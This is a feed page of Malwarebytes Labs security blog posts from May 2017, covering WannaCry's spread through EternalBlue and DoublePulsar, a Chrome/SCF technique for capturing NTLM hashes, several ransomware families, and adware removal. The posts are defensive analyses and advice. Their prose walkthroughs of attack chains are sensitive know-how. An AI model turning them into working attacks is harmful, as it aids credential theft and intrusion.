Techie Feeds

5 Unsettling cyberthreats

Malwarebytes - 2 hours 48 min ago

Cyberthreats are typically boring, repetitive, and require a reasonably predictable remediation process. A SQL injection is a SQL injection, no matter who’s trying it.  But what about the outliers? What about threats that impact you, but you can’t remediate, or establish a policy to cover?

Here are 5 cyberthreats that if you’re not frightened by, you should be.

  1. VNC roulette. This was a website that scanned for computers that allowed for remote sessions, but were unsecured by passwords or encryption. A fair amount of screenshots the site collected were from average users who simply failed to set up proper security settings. But there were also machines for which that failure was much more serious, like SCADA systems, CCTVs, and water treatment plants.


  1. A public drone feed? Last week a security blogger discovered what appeared to be a publically accessible Predator drone feed. As it turned out, the video was actually an unclassified demo page created by a defense contractor using a misconfigured web server. While not exactly the OPSEC blunder viewers thought, the amount of critical infrastructure exposed to the internet and managed via unaccountable third parties is food for thought.


  1. Mirai botnet. Used in some of the largest DDoS attacks ever, including one to silence Brian Krebs, Mirai scans the internet for Internet of Things devices using factory default credentials and infects them. What’s the scope of a Mirai attack? Ars technica reported a Mirai DDoS on French web host OVH of 1.7 terabytes.  That’s not the scary part. The scary part is that the IoT market is booming, they have one of the most abysmal records of security engineering and poor judgment ever seen. And as of 2016, the most conservative estimation for IoT devices on the market was 6.4 billion.


  1. RATs. Some of us are familiar with remote access tools used to spy on the unwitting and sometimes take compromising pictures. But what happens when a RAT is embedded in a SaaS tool? Tech Support scammers have been hit by third-party business services who sold their service with an extra addition of DarkComet. Given how tough it can be to vet a SaaS offering, the potential to impact legitimate businesses is very large.


  1. The Computer Fraud and Abuse Act. Nobody likes fraud and abuse, so what’s the big deal an act designed to keep them off of computers? Well, the act was written in 1986, prompted by a White House screening of the movie WarGames (no, really) and criminalized those who

“having knowingly accessed a computer without authorization or exceeding authorized access”

That bold part has proved problematic in recent years, as the automated scraping of content, saving public data that the owner didn’t intend to make public, and landing on unexpected pages due to a web sites misconfiguration have all been interpreted as violations of the law at one point or another. This is absolutely scary, as the act and its capricious enforcement have led to a chilling effect over vulnerability disclosure and introduced a risk to researchers who might otherwise work with law enforcement.

These are all scary cyberthreats not because of their technical sophistication, but more because they are failures of organizations and institutions that manage technology. Your security team can patch a zero-day vulnerability, but not the executive that insists his password be set to ‘1234’ for ‘convenience.’ When you have strong organizations, the cyberthreats you face suddenly get much less scary.

The post 5 Unsettling cyberthreats appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Stealing Windows credentials using Google Chrome

Malwarebytes - Tue, 05/23/2017 - 14:00

Security researcher Bosko Stankovic recently published an article explaining how an attacker could use Chrome, the SMB file sharing protocol, and Windows Explorer Shell Command File to steal victims credentials.

The basic elements Chrome

Similar attacks have been demonstrated using Internet Explorer and Edge, but being able to do this with a (very popular) third party browser increases the chances of this being used in the wild by a lot. Chrome uses a technique called MIME-sniffing for files with a text or text-like content and downloads files that contain a non-printable character. It downloads these files to the default download folder as specified in the Advanced Settings section of the Chrome Settings.

SMB protocol

This file sharing protocol recently gained a lot of fame by being exploited to spread the WanaCrypt ransomware worm. This protocol is what Windows uses to share files, printers, serial ports, and communicate this information between computers. By intention clients make SMB requests and servers make the resources available after successful authentication. But as it turns out, this feature can be (ab)used for a lot more.

SCF files

Windows Explorer Shell Command File are basically shortcuts with a run command. A very noteworthy feature is that this extension is invisible even if you have your extensions set to show.

So you will have to take a really close look at a file that has a double extension like example.txt.scf to see the difference with an actual txt file.


Another thing that makes SCF files dangerous is that they are triggered as soon as the folder they are in is opened. Windows will send a request for the resource the very moment the file is showing in Windows explorer.

The possible attack

The attacker plants an SCF file containing a non-printable character on a website that he knows his victim(s) frequents (watering hole attack). Or if the threat actor is after a bigger audience he can rig a malvertising campaign or use social media.

Chrome users will get the SCF file downloaded to their default downloads folder and the next time they want to look at or move a file from that folder, the SCF file will be triggered as soon as the downloads folder is opened in Windows Explorer.

As explained, SCF files can be configured to contact a server with a request for resources (i.e. a file). There are no restrictions so this can be a remote server under control by the attacker. In order to make the resource request, it will need to send an authentication request via SMB, which can be captured on the server. The request would include the victims’ username, his domain, and the NTLMv2 password hash. This information can be extremely useful for an attacker who wants to expand his foothold on a network.

The consequences

Once the attacker has the hashed password it depends on the strength of the hash for how long it takes to find out the password. This can vary from mere seconds to a few days. In targeted attacks, you can be sure the username and hash will be checked against lists published after breaches to see whether a password has been re-used and can be matched with the hash even faster.

If the Windows 8/10 user is using Microsoft Authentication (MSA) to use Microsoft services like Office 365, OneDrive, Skype, and many others, the impact on the victims can be even bigger.


You probably heard this before this week, but if you don’t need SMB, disable it. This is the only part of the attack chain the end-user can easily manipulate by executing a simple Powershell command. Other options are:

  • To always use the “Save as… ” option when you are knowingly downloading something, so you’d never have to open the default downloads folder.
  • Alter the file association for SCF files, which you would have to do in the registry. Changing the default value under the key HKEY_CLASSES_ROOT\.scf “ txtfile” makes the files visible and opens it in notepad.

But disabling SMB is more likely to be successful and it helps protect you against other malware like the WannaCry ransom worm and the Adylkuzz cryptocurrency miner.


This article explains how Chrome users are at risk of spilling their Microsoft Authentication credentials by simply visiting the wrong site.


Pieter Arntz

The post Stealing Windows credentials using Google Chrome appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: Ransomware targets Tencent users

Malwarebytes - Mon, 05/22/2017 - 14:00

Early this April, an increase of infection rates by a variant of ransomware known as Android/Ransom.SLocker.fh was seen.

Ransomware targets Tencent users

An especially relevant trait of SLocker.fh is its use of Tenpay to send payment to the criminals. Tenpay is an integrated payment platform by Tencent — China’s largest Internet service portals. Thus, it is no surprise that SLocker.fh originates from China.

In order to pay, users must have a QQ ID to send payment; which is provided.  Since Tencent’s most popular platform is QQ Instant Messenger, the criminals are probably targeting these users the most.

Various iterations to fool users

Like many Android ransomware apps, SLocker.fh masquerades as various legitimate apps to fool users into accepting escalated rights. Users who accept the escalated rights will have their device forced to reboot.  After reboot, users will have their device locked with overlaying screen with instructions to pay.

Click to view slideshow. Click to view slideshow. Stay protected

Because Android ransomware is on the rise, users should be extra cautious. You can protect yourself by being cautious of giving superuser and/or device administrator rights to any app that asks for it. If the app looks shady like the two example above, this is especially true.

So you’re infected with ransomware

A good anti-malware scanner like Malwarebytes Anti-Malware Mobile can remove the ransomware, but only BEFORE escalated rights are granted. Afterward, it becomes a bit harder. For how to remove such infections, refer to blog post “Difficulty removing Koler Trojan or other ransomware on Android?

As always, stay safe out there.

The post Mobile Menace Monday: Ransomware targets Tencent users appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 15 – May 21)

Malwarebytes - Mon, 05/22/2017 - 13:59

Last week was dominated by the WannaCry ransomware and the discussions ensuing it. We published:

Others discussed:

In other news we celebrated Privacy Awareness Week, highlighting the two main themes:

  1. Share with care.
  2. Trust and transparency.

And we gave out some pointers on what to consider and how to act when you have reason to believe that your personal information was stolen.

Other important security news:

  • Researchers from Carnegie Mellon University, Seagate, and the Swiss Federal Institute of Zurich published a paper entitled “Vulnerabilities in MLC NAND Flash Memory Programming: Experimental Analysis, Exploits, and Mitigation Techniques.” Our friends at Bleeping computer explained the found vulnerability of SSD drives.
  • A Croatian security investigator has discovered a new network worm that uses 7 tools and exploits from the US intelligence service NSA. The worm is called EternalRocks, but its original name is “MicroBotMassiveNet“.
  • Wikileaks has brought out information about other CIA tools called Athena and Hera, spyware designed to take full, remote control over infected Windows PCs.

In non-security news, we were amazed by this jewel telling us that scientists at UCLA and the University of Connecticut managed to create a protein-based battery-like device that extracts energy from the human body which could potentially be used to power implants like pacemakers.

Safe surfing, everyone!

The Malwarebytes Labs Team

The post A week in security (May 15 – May 21) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

WannaDecrypt your files? The WannaCry solution, for some

Malwarebytes - Fri, 05/19/2017 - 20:11

We just wanted to shoot out a quick blog post to let you know about a decryptor (Wanakiwi) that has been developed for WannaCry/WannaCrypt/wCrypt. There is a catch though, it only works for the following operating systems:

  • Windows XP
  • Windows Server 2003
  • Windows Vista
  • Windows Server 2008
  • Windows Server 2008 R2
  • Windows 7

So if you’ve got a WannaCry infection on one of the above operating systems, there is hope!


The decryptor is only going to work if you haven’t restarted the infected system and you haven’t killed the ransomware process (should be wnry.exe or wcry.exe) so please don’t restart or kill the process if you want to get those files back!


In order to use this tool, you first need to download it from here.

This tool essentially searches the system’s memory for prime numbers and pieces together the encryption key used. However, it relies on current running memory so once you reboot it will be gone and if you’ve done too much on the system since infection, it’s possible the key won’t be found (because it’s been overwritten by data from other applications using the same memory space).

To run it, download the linked file (above) and extract the .zip to a folder on your desktop, (if you can download the file from a clean system and then transfer it via USB, you run less risk of overwriting the key in memory).

Next, you can either double click it (boring) or open the command prompt (Start + CMD) and run it through there (fun!).

The tool will automatically identify the WannaCrypt applications running on the system if they are called wnry.exe or wcry.exe, but if for some reason they can’t find them, maybe check out the running applications on your system (Task Manager/Process Explorer) and find the offender (it’s pretty obvious), then identify the Process Identification Number (PID) and you can just plug that into the command prompt after wanakiwi.exe.

It might take a few minutes for the tool to find the key (or many minutes in some cases), but once it’s found the tool is going to start searching your system for encrypted files and decrypt them automatically.


After the tool finishes decrypting your files, you are going to be left with a ransom note as a background and lots of encrypted files next to your unencrypted files.

Here are some possible next steps:

  • Download Malwarebytes 3.0 (or whatever scanning tool you prefer that can clean up WannaCry) and run a scan on the system to identify all artifacts related to WannaCry. This will help you get the malware off the system in case it tries to encrypt again.
  • Restart the computer to finish clean-up.
  • Find all the most important files you want to keep and move them to some form of backup.
  • Wipe the system and reinstall Windows.
  • OR you can just go through your system looking for all files with the .WNCRY extension and getting rid of them.

The original memory scrubbing, prime number searching WannaKey decryptor tool (for XP) was written by Adrien Guinet (@adriengnt) and then used as the base for Wanakiwi developed by Benjamin Delpy (@gentilkiwi). These guys are incredibly talented and deserve a round of applause!

We found out about the tool thanks to the very extensive blog post by Matt Suiche (@msuiche), which you should check out to get more information about how these tools work. You might remember Matt from his assistance in stopping a variant of the WannaCry released last week by registering the killswitch domain.


We didn’t want to write about this tool until we tested it in some capacity. A lot of other security researchers have given it a go and it seems that the tool works well in lab environments (sometimes). I personally tested it on a Windows 7 system using the following sample (with mixed results):


  • My first test worked like a charm.
  • My second test with a new profile (for taking screenshots for this post) couldn’t actually launch the malware.
  • My third test launched the malware, but the decryptor took forever and eventually never found the key.
  • My fourth test worked like a charm again (original profile).
  • Some of our other researchers tried it and were unable to get the tool to find the key.

This tool was put together very quickly and it’s meant to help those that it can help and that is likely not everybody. I wouldn’t recommend putting all your eggs in the basket that if you get hit, you couldn’t decrypt using this tool because either:

  • You are likely going to be unable to recover the key OR
  • The malware will modify to clean up the running memory or force a reboot after install to make the tool ineffective

But if you are currently dealing with a WannaCry infection, you have barely touched the infected system(s), and you are running one of the operating systems listed at the beginning of this post, running the tool is not going to break anything that isn’t already broken so it’s worth a shot just to see if you can get those files back.

That being said, once again big thanks to @adriengnt, @gentilkiwi & @msuiche for their hard work, information spreading and ingenious development skills.

Let us know in the comments if this tool worked for you (and your configuration too!)

The post WannaDecrypt your files? The WannaCry solution, for some appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How did the WannaCry Ransomworm spread?

Malwarebytes - Fri, 05/19/2017 - 14:00

Security researchers have had a busy week since the WannaCry ransomware outbreak that wreaked havoc on computers worldwide. News of the infection and the subsequent viral images showing everything from large display terminals to kiosks being affected created pandemonium in ways that haven’t been seen since possibly the MyDoom worm circa 2004.

News organizations and other publications were inundating security companies for information to provide to the general public – and some were all too happy to oblige. Information quickly spread that a malicious spam campaign had been responsible for circulating the malware. This claim will usually be a safe bet, as ransomware is often spread via malicious spam campaigns. Admittedly, we also first thought the campaign may have been spread by spam and subsequently spent the entire weekend pouring through emails within the Malwarebytes Email Telemetry system searching for the culprit. But like many others, our traps came up empty.

Claims of WannaCry being distributed via email may have been an easy mistake to make. Not only was the malware outbreak occurring on a Friday afternoon, but around the same time a new ransomware campaign was being heavily distributed via malicious email and the popular Necurs botnet. We recently wrote about the Jaff ransomware family and the spam campaign that was delivering it.

Some may have seen the rash of news occurring on their feeds, an uptick in ransomware-themed document malware in their honeypots, and then jumped to conclusions as a way to be first with the news.

But here at Malwarebytes we try not to do that. And now after a thorough review of the collected information, on behalf of the entire Malwarebytes Threat Intelligence team, we feel confident in saying those speculations were incorrect.

Indeed, the ‘ransomworm’ that took the world by storm was not distributed via an email malspam campaign. Rather, our research shows this nasty worm was spread via an operation that hunts down vulnerable public facing SMB ports and then uses the alleged NSA-leaked EternalBlue exploit to get on the network and then the (also NSA alleged) DoublePulsar exploit to establish persistence and allow for the installation of the WannaCry Ransomware.

We will present information to support this claim by analyzing the available packet captures, binary files, and content from within the information contained in the ShadowBrokers dump, and correlating what we know thus far regarding the malware infection vector.

Here’s what we know EternalBlue

EternalBlue is an SMB exploit affecting various Windows operating systems from XP to Windows 7 and various flavors of Windows Server 2003 & 2008. The exploit technique is known as HeapSpraying and is used to inject shellcode into vulnerable systems allowing for the exploitation of the system. The code is capable of targeting vulnerable machine by IP address and attempting exploitation via SMB port 445. The EternalBlue code is closely tied with the DoublePulsar backdoor and even checks for the existence of the malware during the installation routine.

EternalBlue checks for DoublePulsar

EternalBlue strings

Bits of information obtained by reviewing the EternalBlue-2.2.0.exe file help demonstrate the expected behavior of the software. The screenshot above shows that the malware:

  • Sends an SMB Echo request to the targeted machine
  • Sets up the exploit for the target architecture
  • Performs SMB fingerprinting
  • Attempts exploit
  • If successful exploitation occurs, WIN
  • Pings the backdoor to get an SMB reply
  • And if the backdoor is not installed, it’s game on!

The ability of this code to beacon out to other potential SMB targets allows for propagation of the malicious code to other vulnerable machines on connected networks. This is what made the WannaCry ransomware so dangerous. The ability to spread and self-propagate causes widespread infection without any user interaction.


DoublePulsar is the backdoor malware that EternalBlue checks to determine the existence and they are closely tied together.

This particular malware uses an APC (Asynchronous Procedure Call) to inject a DLL into the user mode process of lsass.exe. Once injected, exploit shellcode is installed to help maintain persistence on the target machine. After verifying a successful installation, the backdoor code can be removed from the system.

DoublePulsar Parameters

The purpose of the DoublePulsar malware is to establish a connection allowing the attacker to exfiltrate information and/or install additional malware (such as WannaCry) to the system. These connections allow an attacker to establish a Ring 0 level connection via SMB (TCP port 445) and or RDP (TCP port 3389) protocols.

DoublePulsar Ring0 Connections

Network analysis

Taking a look at the wannacry.pcap file shared to VirusTotal by @benkow_ helps us attribute the previously discussed code as the infection vector via the initial calls of the attack cycle.

A high-level view of a compromised machine in Argentina ( that attacked the honeypot:

The widely publicized kill-switch domain is present in the pcap file. As was reported, the malware made a DNS request to this site. Until @MalwareTech inadvertently shut down the campaign by registering the domain, the malware would use this as a mechanism to determine if it should run.

DNS lookup to Sinkhole

The SMB traffic is also clearly visible in the capture. These SMB requests are checking for vulnerable machines using the exploit code above.

SMB Requests

The exploit sends an SMB ‘trans2 SESSION_SETUP’ request to the infected machine. According to SANS, this is short for Transaction 2 Subcommand Extension and is a function of the exploit. This request can determine if a system is already compromised and will issue different response codes to the attacker indicating ‘normal’ or ‘infected’ machines.

Diving into the .pcap a bit more, we can indeed see this SMB Trans2 command and the subsequent response code of 81 which indicates an infected system. If the attacker receives this code in response, then the SMB exploits can be used as a means to covertly exfiltrate data or install software such as WannaCry.

Trans2 Multiplex ID

Putting it all together

The information we have gathered by studying the DoublePulsar backdoor capabilities allows us to link this SMB exploit to the EternalBlue SMB exploit. It’s really not hard to do so as both were patched as part of the MS17-017 Security Bulletin prior to this event, and as previously mentioned, were both released in the well-publicized ShadowBrokers-NSA dumps.

Without otherwise definitive proof of the infection vector via user-provided captures or logs, and based on the user reports stating that machines were infected when employees arrived for work, we’re left to conclude that the attackers initiated an operation to hunt down vulnerable public facing SMB ports, and once located, using the newly available SMB exploits to deploy malware and propagate to other vulnerable machines within connected networks.

Developing a well-crafted campaign to identify just as little as a few thousand vulnerable machines would allow for the widespread distribution of this malware on the scale and speed that we saw with this particular ransomware variant.

So what did we learn?

Don’t jump to conclusions. Malware analysis is difficult and it can take some time to determine attribution to a specific group, and/or to assess the functionality of a particular campaign – especially late on a Friday (which BTW, can all you hackers quit making releases on Fridays!!). First, comes stopping the attack, second comes analyzing the attack. Remember, patience is a virtue.

Update, update, UPDATE! Microsoft released patches for these exploits prior to their weaponization. Granted, patches weren’t available for all Operating Systems, but the patch was available for the vast majority of machines. This event even forced Microsoft to release a patch for the long-ago EOL Windows XP – which gets back to the first thing that was said. UPDATE! Why are there still machines on XP!? These machines are vulnerable (beyond this attack) to the ransomware functionality of this attack and they need to be updated.

Disable unnecessary protocols. SMB is used to transfer files between computers. The setting is enabled on many machines but is not needed by the majority. Disable SMB and other communications protocols if not in use.

Network Segmentation is also a valuable suggestion as such precautions can prevent such outbreaks from spreading to other systems and networks, thus reducing exposure of important systems.

And finally, don’t horde exploits. Microsoft president Brad Smith used this event to call out the ‘nations of the world’ to not stockpile flaws in computer code that could be used to craft digital weapons.

That reminds me of an article I wrote a few years ago (and which was substantially cut for length) about Hacking Team and the government sanctioned use of exploits.

Hack Me: A Geopolitical Analysis of the Government Use of Surveillance Software

I guess things haven’t changed…

The post How did the WannaCry Ransomworm spread? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Information stolen? What now?

Malwarebytes - Thu, 05/18/2017 - 15:00

There are several different types of malware that look for interesting information on an infected computer and transmit that information to the threat actor.

Identifying and removing the malware is our job, but what do you need to do yourself to control the aftermath? To answer that question it’s important to know what information the malware was after and sometimes how long it has been active.


What types of information are the malware authors after? Most of the time they are after anything that they can turn into cash. In rare cases of targeted attacks, they could be after other confidential information. Consider for example a keylogger installed by a close relative who is curious about some aspects of your private life.

But usually we can divide the sought after information in these categories:

  • Banking details
  • Shopping website credentials
  • Other website credentials
  • Gaming credentials
  • Bitcoin and other eMoney wallets
  • Email credentials
Time period

When is the infection period important and why? It is important in cases of malware that tracks the user’s activities like keyloggers and malware that intercepts internet traffic. It should be clear that knowing when this tracking started can be very helpful in determining which important information could have been stolen.

Tip: do not rely on your memory too much. If you are not sure, change that password of which you are unsure whether you have used it recently.

How do I recognize malware that has stolen information?

Sometimes you can tell by our naming convention that a particular malware was after your information. But not all of them are called Spyware.PasswordStealer. For starters look up information about the detection on your machine. Alarm bells should be ringing if the detections are spyware, keyloggers, and backdoors. Although, other Trojans are capable of stealing information as well.

In our threat library you can find information of this kind under the header Remediation, so look for your detection there if this applies to you.


In most cases, this is easy to guess. The stolen information could be used in ways that will cost you money. What could be the threat actors goals?

  • Withdrawing money from your accounts
  • Shopping at your expense
  • Impersonating you for other reasons
  • Extortion with personal information (doxing, sextortion, etc.)

What can you do to limit the dangers as much as possible?

  • Change the passwords that might have been stolen for every website you can remember logging into.
  • If your email account has been compromised, change that password first as other credentials may be sent to you by mail and still end up in the wrong hands. Some webshops even send you a password in plain-text (shudders).
  • Keep a close eye on your banking and eMoney accounts. Use the activity alerts that some banks offer.
  • Keep tabs on your posts in social media. It may look silly to check what you have supposedly posted yourself, but imagine someone else doing it for you.
Extra precautions Related article

Info stealers

Stay safe out there and get protected.


Pieter Arntz

The post Information stolen? What now? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Privacy Awareness Week: A primer

Malwarebytes - Wed, 05/17/2017 - 15:00

The Asia Pacific Privacy Authorities (APPA) began an initiative called Privacy Awareness Week, or PAW, with the purpose of educating users about current privacy issues and promoting the importance of keeping their personal information safe.

This remains the core of why it exists for more than a decade now.

For those who may not be familiar with what this campaign is all about, this post aims to answer the questions you may have in mind about PAW.

When is Privacy Awareness Week?

APPA typically celebrates Privacy Awareness Week in May every year. Since the organization has a number of member countries, they each decide on when they want to hold the event locally.

In the first week of May, Singapore held its PAW locally. Hong Kong, New Zealand, and the United States held their own campaigns in the second week of May.

Australia is celebrating Privacy Awareness Week this week.

Are there other countries that will hold this event?

There are a total of 11 member countries comprising APPA. Aside from those already mentioned, Canada, Colombia, Korea, Macao, Mexico, and Peru are or will also be celebrating this campaign.

What’s the theme of this year’s Privacy Awareness Week?

There are two themes that APPA members are using: “Share with care” and “Trust and transparency”.

Share with care. This stresses on the importance of caring for your privacy, given that our current technological landscape is heavily data-driven. It also reminds users to think about what may or may not happen to their personal information once they have been shared.

Trust and transparency: Both trust and transparency are vital to each another, as people normally expect one to exist with the other. Case in point, it is important for businesses to gain the trust of their clients and it’s important for clients to know that the businesses they trust are clear about what they do, how they store, and how they use what they give them, which in this case is their personal information.

Can we celebrate Privacy Awareness Week even if our country is not a member of APPA?

Privacy Awareness Week is about educating users concerning privacy. There are ways individuals and organizations can celebrate PAW. One example is to use social media to raise awareness to your followers. Another is to do a refresher of your organization’s privacy policy. If they don’t have one, why not encourage your organization to make one?

Privacy and security go hand in hand. Practicing solid cybersecurity hygiene coupled with a fair familiarity of how personal data changes hands can bring about positive experiences to our digital lives. As such, we encourage you, dear Reader, to check out some of our previous posts and reacquaint yourselves on how you can keep your data safe and your computing devices secure:

Happy Privacy Security Week, everyone, wherever you are, and remember to share your personal info with care!


The Malwarebytes Labs Team

The post Privacy Awareness Week: A primer appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Wanna Cry some more? Ransomware roundup special edition

Malwarebytes - Mon, 05/15/2017 - 21:25

Whether you call it WannaCry, WannaCrypt, WCrypt, Wanacrypt0r, WCry, or one of the other names currently vying for the “call me this” crown, the ubiquitous ransomware which brought portions of the UK’s NHS to its knees over the weekend along with everything from train stations to ATM machines is still with us, and causing mayhem Worldwide. As a result, our regular roundup has been replaced with what will hopefully serve as a useful place to collect links related to the attack.

First thing’s first: this was a big enough incident that Microsoft created a special patch for Windows XP users, some three years after it had the plug pulled on support. Regardless of Windows OS, go get your update.

Now that we have that out of the way, here’s some handy links for you to get a good overview of what’s been going on:

This is a rapidly changing story, with a lot of valuable follow-up data being posted to haunts favored by security researchers such as Twitter, and we’ll likely add more links as the days pass. Update your security tools, patch your version of Windows and stay safe!


The Malwarebytes Labs Team

The post Wanna Cry some more? Ransomware roundup special edition appeared first on Malwarebytes Labs.

Categories: Techie Feeds

The worm that spreads WanaCrypt0r

Malwarebytes - Fri, 05/12/2017 - 22:02

Something that many security researchers have feared has indeed come true. Threat actors have integrated a critical exploit taking advantage of a popular communication protocol used by Windows systems, crippling thousands of computers worldwide with ransomware.

Within hours of being leveraged, a flaw that had been recently patched by Microsoft has been used to distribute the WanaCrypt0r ransomware and wreak havoc worldwide.

In this blog post, we will describe the worm responsible for spreading this ransomware by looking at its capabilities and what has made this threat so successful.

Main functionality

WanaCrypt0r has been most effective—not only does the ransomware loop through every open RDP session on a system and run the ransomware as that user, but the initial component that gets dropped on systems appears to be a worm that contains and runs the ransomware, spreading itself using the ETERNALBLUE SMB vulnerability (MS17-010).

The WinMain of this executable first tries to connect to the website It doesn’t actually download anything there, just tries to connect. If the connection succeeds, the binary exits.

This was probably some kind of kill switch or anti-sandbox technique. Whichever it is, it has backfired on the authors of the worm, as the domain has been sinkholed and the host in question now resolves to an IP address that hosts a website. Therefore, nothing will happen on any new systems that runs the executable. This only applies to the binary with the hash listed above; there may well be new versions released in the future.

After this check passes, the first thing the worm does is check the number of arguments it was launched with. If it was run with less than two arguments passed, it installs a service called mssecsvc2.0 with display name Microsoft Security Center (2.0) Service (where the binary ran is itself with two arguments), starts that service, drops the ransomware binary located in the resources of the worm, and runs it.

If it was run with two arguments or more—in other words, if it was run as a service—execution eventually falls through to the worm function.

The initialization function called first calls WSAStartup() to initialize networking, then CryptAcquireContext() to initialize the crypto API so it can use a cryptographically-secure pseudo-random number generator. It then calls a function that initializes two buffers used for storing the worm payload DLLs, one x86 and one x64. It copies the payload DLLs from the .data section of the worm and then copies the entire worm binary after it.

The code of each payload DLL is very small, just getting the resource content (i.e. the worm binary), dropping to disk as C:\WINDOWS\mssecsvc.exe (this path is actually hardcoded) and executing it.

SMB vulnerability leveraged to spread ransomware worldwide

After initializing the functionality used by the worm, two threads are created. The first thread scans hosts on the LAN. The second thread gets created 128 times and scans hosts on the wider Internet.

The first thread (in charge of scanning LAN) uses GetAdaptersInfo() to get a list of IP ranges on the local network, then creates an array of every IP in those ranges to scan.

The LAN scanning is multithreaded itself, and there is code to prevent scanning more than 10 IP addresses on the LAN at a time.

The scanning thread tries to connect to port 445, and if so creates a new thread to try to exploit the system using MS17-010/EternalBlue. If the exploitation attempts take over 10 minutes, then the exploitation thread is stopped.

The threads that scan the Internet generate a random IP address, using either the OS’s cryptographically secure pseudo-random number generator initialized earlier, or a weaker pseudo-random number generator if the CSPRNG failed to initialize. If connection to port 445 on that random IP address succeeds, the entire /24 range is scanned, and if port 445 is open, exploit attempts are made. This time, exploitation timeout for each IP happens not after 10 minutes but after one hour.

The exploitation thread tries several times to exploit, with two different sets of buffers used (perhaps one for x86 and one for x64). If it detects the presence of DOUBLEPULSAR after any exploitation attempt, it uses DOUBLEPULSAR to load the relevant payload DLL.


It is critical that you install all available OS updates to prevent getting exploited by the MS17-010 vulnerability. Any systems running a Windows version that did not receive a patch for this vulnerability should be removed from all networks. If your systems have been affected, DOUBLEPULSAR will have also been installed, so this will need to also be removed. A script is available that can remotely detect and remove the DOUBLEPULSAR backdoor. Consumer and business customers of Malwarebytes are protected from this ransomware by the premium version of Malwarebytes and Malwarebytes Endpoint Security, respectively.

The post The worm that spreads WanaCrypt0r appeared first on Malwarebytes Labs.

Categories: Techie Feeds

WanaCrypt0r ransomware hits it big just before the weekend

Malwarebytes - Fri, 05/12/2017 - 18:07

Reports of two massive, global ransomware attacks are dominating the news. As workers in Europe are heading home for the weekend, ransomware is shutting down their systems. Here’s what we know so far.

Big targets

National Health Service (NHS) England, and Telefonica, one of the largest telecom providers in the world, have each given out statements indicating that their systems have been brought to a grinding halt by a ransomware that Malwarebytes detects as Ransom.WanaCrypt0r. The ransomware has also been observed hitting companies in Spain, Russia, Ukraine, and Taiwan.


The ransomware is spread using a known, and patched, vulnerability (MS17-010) that came from a leaked NSA set of exploits that we reported on our blog in April. Our research shows the encryption is done with RSA-2048 encryption. That means that decryption will be next to impossible, unless the coders have made a mistake that we haven’t found yet.

The demanded ransom of $300 and the potential risks to the public that come with the targets being big utility and healthcare companies seem to be in shrill contrast. We can only hope that the companies that were hit will be able to get their backups deployed quickly and can start the recovery from this cyberattack. 


Consumers and businesses alike should be sure their systems and software are updated with all current patches in order to stop the spread of infection. Both our consumer product, Malwarebytes, and our business product, Malwarebytes Endpoint Security, protect against this threat, since we detect this ransomware. And our anti-ransomware technology will stop any future unknown variants.

More to come

We’ll continue to update this post as news develops. We’ll provide additional technical analysis throughout the day.

The post WanaCrypt0r ransomware hits it big just before the weekend appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New ‘Jaff’ ransomware via Necurs asks for 2 BTC

Malwarebytes - Thu, 05/11/2017 - 17:11

There is yet another ransomware on the block, but contrary to the many copycats out there this one appears to be more serious and widespread since it is part of the Necurs spam campaigns.

Originally identified by security researcher S!Ri, the Jaff ransomware looks very identical to Locky in many ways: same distribution via the Necurs botnet, same PDF that opens up a Word document with a macro, and also similar payment page.

However, this is where the comparison ends, since the code base is different as well as the ransom itself. Jaff asks for an astounding 2 BTC, which is about $3,700 at the time of writing.

Malwarebytes users are already protected against this ransomware thanks to our multi-layer defense. In the diagram below we show how the threat can be blocked via each of our protection modules (in a typical scenario, the threat would be stopped at the first layer which is the Application Behavior Protection):

In the meantime, the return of Locky after a short hiatus has not been as big as anticipated. The appearance of the Jaff ransomware may also take away some market shares from it.

The post New ‘Jaff’ ransomware via Necurs asks for 2 BTC appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Adware the series, part 3

Malwarebytes - Wed, 05/10/2017 - 15:00

In this series of posts, we will be using the flowchart below to follow the process of determining which adware we are dealing with. Our objective is to give you an idea of how many different types of adware are around for Windows systems. Though most are classified as PUPs, you will also see the occasional Trojan or rootkit, especially for the types that are more difficult to detect and remove.

Getting rid of files

In this post, we will discuss several methods to remove the files responsible for showing you the offending advertisements in those cases where the identified process is not a browser.


With many PUPs and sometimes even more intrusive adware, uninstalling the program that is showing you the advertisements will be enough. If this works it’s often the cleanest and easiest method to get rid of the advertisements. Identifying which program to uninstall from your list of installed software and features is sometimes the hardest step in this process. Here are a few tips that might help you to do so:

  • Use your favorite search engine to look for the process name we found to be responsible for the advertisement window. Sometimes this will reveal the name of the software it belongs to and how it’s listed in your list of installed programs and features.
  • Sort the list of installed programs and features by date of install. Although this date can easily be spoofed, most software packages in this category won’t. Compare that date to the date when the advertisements first started appearing.

  • Warning: in cases where you used a bundler there might be several entries with the same date.
  • Use your favorite search engine to look for the entries in your list of installed programs and features that you don’t recognize or remember installing.

Once you have identified the entries you want to remove, select them by clicking on the line in the list, and click on Uninstall.

It may be necessary to reboot the system for the changes to take effect. If this solves the problem, great. If not, keep reading.

Delete the file

If the advertisements don’t stop after trying the user-friendly approach outlined earlier, your next step is to delete the file which is responsible for the advertisements. This is much less a clean solution as it might leave more clutter behind. There are several methods that can be used and I will try to list them according to stubbornness. But first, we need to find the file. Since we already used Process Explorer to identify the process, we will also use it to locate the file. Right-click on the selected process and choose Properties and look at the Image tab to see the full path to the file.

Make a note of the path as we will need that later on. Then close the properties window and right-click the selected process once more. This time use the Kill Process Tree option and confirm that you want to kill this process (and if applicable the ones under it). If the process respawns immediately or Process Explorer (running elevated) is unable to kill it, you will have to wait for other parts in this series. If the process dies you can proceed with the deletion methods below.

  • Easy: navigate to the file path you made a note of earlier, right-click the file and choose Delete.
  • If that doesn’t work, there is always FileASSASSIN, but you will have to be 100% sure about the file you are going to remove.
    • Download and install FileASSASSIN following the prompts.

Browse to the file you want to delete, check all the upper boxes as shown below and click Execute.

  • You will see a prompt telling you whether the deletion was successful or not.
  • If this method does not work, give the Use delete on Windows reboot functions of FileASSASSIN a try.
